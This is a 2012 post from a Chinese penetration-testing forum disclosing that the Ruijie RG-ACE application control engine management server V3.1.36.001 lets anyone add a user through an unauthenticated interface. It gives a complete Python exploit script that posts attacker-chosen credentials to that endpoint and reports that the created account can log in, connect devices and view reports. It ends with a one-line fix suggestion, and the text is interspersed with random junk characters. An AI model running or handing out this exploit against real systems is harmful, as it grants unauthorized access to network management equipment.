找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
返回列表 发新帖
查看: 2380|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)& e! C( B9 g, b3 U
; ]- c$ |. L: }

2 R( U: a5 H& G9 k: [0 ^. O测试的具体版本是
3 u" l  e4 E$ u, L/ H" T! e5 `/ n5 t9 Z产品名称: 锐捷应用控制引擎. @- Z3 a1 L4 i( \
版本号: 3.1.36.001 TC  ^9 B8 `7 e8 H4 ~( K+ c
编译时间: 2011042917302 x% t5 Y+ d4 O
0 P1 {( _0 E5 @
3 F$ k9 n& d. W
漏洞证明:' x; a1 y, S% J% s3 E$ W" _

7 n9 g* h0 Q2 s) z  Y  J+ E/ g4 _4 `0 o5 w+ Y) \
7 |$ ]" k. g2 W4 B
# x$ f# K* u* G! Q
2 s/ Q  g9 _/ \. O2 G
: J7 K0 ^: I. K2 U( S+ K
执行脚本
* p9 A5 L+ l9 r7 I2 Z4 n, S#! /usr/bin/env python: {: `) Z, H: m9 E/ o- J
#coding=gbk3 |2 v/ `; S3 o% M+ j9 s
#RG-ACE管理服务器 V3.1.36.001* s9 T% H0 ?( o9 v
import urllib2, urllib,cookielib; M$ H' i/ e  y. Z# S' q+ d$ i; |
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
8 l, T5 g, e7 z8 m. G: V' B1 iopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))  H; L3 l# e( l0 L& F3 u
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
( G% M* v7 W; {& w  U" j  Opost=(("event","userManager.doInsertUserInfo"),% j9 D/ M% P& Y( D5 [  U
("useractionname","addButtonValue"),& D) z" C( U$ ]& b  n
("useropermanager","userManager"),: v  W3 I, c- B4 B
("userName","t"), #######账号自己加
: @* V: c8 m+ Q. ^, a; Y& o("pwd","aaaaaa"),######密码自己加
% H& N0 g3 d8 a5 j% \+ C("trueName","ad"),
  b  c) A4 Q( z5 m: l("email",""),
4 Y+ ~# r% Z( ?/ {$ A6 q; {# b("mobilePhone",""),
0 o( Y. d) s- D: T("officePhone",""),
7 c( t! c6 Y: a& M5 v1 i("addr",""),4 ^' H7 n2 v" r% w
("submit","确定"))
. v, }& R; ~- K9 e8 C+ o' I2 Gurllib2.install_opener(opener)0 S6 w0 @2 V3 }; G6 h! S% W* v
p=urllib2.urlopen(url, urllib.urlencode(post)).read()9 [9 g% y# o4 q0 b5 e' ]' D, s
print "Done"
+ c' C$ G. E  t; b. `
" \0 D6 Z$ k! |$ Y! J. J6 R2 g登录,连接设备0 c& ?, y$ r/ r7 Z5 b/ n" f& q* N4 R

* {: u" c' v, |1 q5 q% U! @( q; O# ?; }; @+ L/ D- `. d

1 ~; r8 N4 ~3 G9 W9 C0 O5 Y8 y  P! L: C3 y$ g
5 d9 g' j7 G  N
默认的管理员admin权限更大点
5 q/ Z" ?! z+ _( S; a
9 m1 S0 h8 q# o+ ]1 z8 }5 H# j8 T. Z( r( S3 T. v% k
1 Y9 N$ L0 ]/ _, p; h* ~, P

; @1 w0 f* U3 h
2 I5 j* T1 @9 H4 g$ ^修复方案:, ^- q4 `" e, Y  Y9 v5 b0 c5 m6 A
加强对接口的权限验证
8 V5 k$ Y/ }# V) B
( }& g! c2 x8 x2 i
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表